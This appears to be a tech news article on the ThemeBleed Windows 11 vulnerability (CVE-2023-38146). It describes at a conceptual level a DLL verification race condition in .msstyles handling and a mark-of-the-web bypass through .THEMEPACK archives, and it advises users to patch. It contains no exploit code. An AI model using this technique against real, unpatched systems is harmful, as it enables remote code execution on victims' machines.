AI DevwWrld CyberDSA Chatbot Summit Cyber Revolution Summit CYSEC Global Cyber Security & Cloud Expo World Series Digital Identity & Authentication Summit Asian Integrated Resort Expo Middle East Low Code No Code Summit TimeAI Summit

RCE ThemeBleed bug discovered in Windows 11 with a test exploit

A risky vulnerability discovered in Windows 11 Themes opens the door to attackers

An exploit called ThemeBleed has been discovered that allows attackers to execute code on the system. The flaw has been patched by Microsoft, but users are advised to apply security updates.

This pill is also available in Italian language

Proof of exploit code has been published for a vulnerability in Windows Themes, identified as CVE-2023-38146, which allows remote attackers to execute code on the system. This security issue, also known as ThemeBleed, has been given a high severity rating of 8.8. This vulnerability could be exploited if the user opened a maliciously crafted .THEME file created by the attacker.

Details about ThemeBleed

The vulnerability was discovered by Gabe Kirkpatrick, one of the researchers who reported the issue to Microsoft on May 15. For reporting the flaw, Kirkpatrick received a $5000 reward. CVE-2023-38146 was patched by Microsoft two days ago, during Patch Tuesday September 2023.

A flaw discovered via "weird Windows file formats"

Kirkpatrick found the vulnerability while analyzing "strange Windows file formats," including the .THEME file format used to customize the appearance of the operating system. These files contain references to '.msstyles' files, which should only consist of graphic assets that are loaded when the theme file is opened.

Exploitation method and solution

The researcher noted that when the version number "999" is used, the process for handling .MSSTYLES files has a significant discrepancy between when the signature of a DLL ("_vrf.dll") is verified and when where it is loaded, creating a race condition. With the use of a specially crafted .MSSTYLES file, an attacker can exploit a race window to replace a verified DLL with a malicious one, thus allowing them to execute arbitrary code on the target machine. Microsoft fixed the problem by completely removing the "version 999" functionality. However, the underlying race condition remains, Kirkpatrick says. Furthermore, the researcher points out that downloading a theme file from the web generates the "mark-of-the-web" warning, which can warn the user of the threat. However, this can be bypassed if the attacker encapsulates the theme in a .THEMEPACK file, a CAB archive. When the CAB file is run, the content theme opens automatically without showing the "mark-of-the-web" warning. Microsoft has not, at this time, addressed the lack of "mark-of-the-web" warnings for themepack files. Windows users are advised to apply Microsoft's September 2023 security update package as soon as possible, as it addresses two currently exploited zero-day vulnerabilities and 57 other security issues in various applications and system components.

Follow us on WhatsApp for more pills like this

09/14/2023 17:01

Editorial AI

Last pills

Serious vulnerability discovered in Rabbit R1: all user data at riskVulnerability in Rabbit R1 exposes sensitive API keys. What are the privacy risks?

Cyber attack in Indonesia: the new Brain Cipher ransomware brings services to their kneesNew ransomware hits Indonesia: learn how Brain Cipher crippled essential services and the techniques used by hackers

Patelco Credit Union: security incident halts customer services in CaliforniaService disruption and customer frustration: Patelco Credit Union works to resolve security incident

Cyber attack on TeamViewer: immediate response and investigations underwayStrengthened security measures and international collaborations to counter the cyber threat